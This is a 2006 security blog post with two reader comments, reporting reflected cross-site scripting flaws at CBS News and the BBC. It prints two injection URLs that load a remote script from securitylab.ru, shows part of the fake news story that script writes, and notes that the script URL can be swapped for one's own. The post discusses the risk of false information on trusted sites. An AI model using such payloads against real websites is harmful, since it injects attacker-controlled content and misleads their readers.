Sunday, August 27, 2006

Why 0wn When You Can XSS

The creative Russians at Security Lab posted word of two more high-profile sites with Cross Site Scripting (XSS) vulnerabilities. They used this announcement to demonstrate problems at CBS News and the BBC.

The URL they provide for CBS is:

http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1 \
--%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

(Remove the space and \ to make the URL one big line.)

Looks like there's a problem with the zipcode part of the site through which one can check local weather.

The URL for the BBC is similar:

http://www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today %22%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

(Remove the space and \ to make the URL one big line.)

The file sc.js that they retrieve has the following:

document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment</b>');
...truncated...

The net effect is demonstrated by these screen captures for CBS News and the BBC.

Yes, the use of sc.js means you could replace the URL http://www.securitylab.ru/test/sc.js with one of your own, causing your custom news to be placed at either site -- until they disable the functionality or remove the vulnerability.

Eight to ten years ago Web defacements were the rage. They seemed to get less attention as the major players removed traditional means of exploitation. As Web sites have become more complex, intruders are finding new ways to abuse them. While this is less of a defacement and more of a dynamic presentation of attacker information, it's still a big problem. Think of the havoc false information could temporarily cause.

People already shouldn't trust what they read in emails. Soon they may lose trust in what they read on Web sites.

2 comments:

xianman said...

You're not actually modifying the web site, only changing what's displayed to whomever clicks the link. Big deal.

Richard Bejtlich said...

xianman, that's why the title of this post is what it says.

However, from the perspective of the average user, there is little difference. That is a big deal.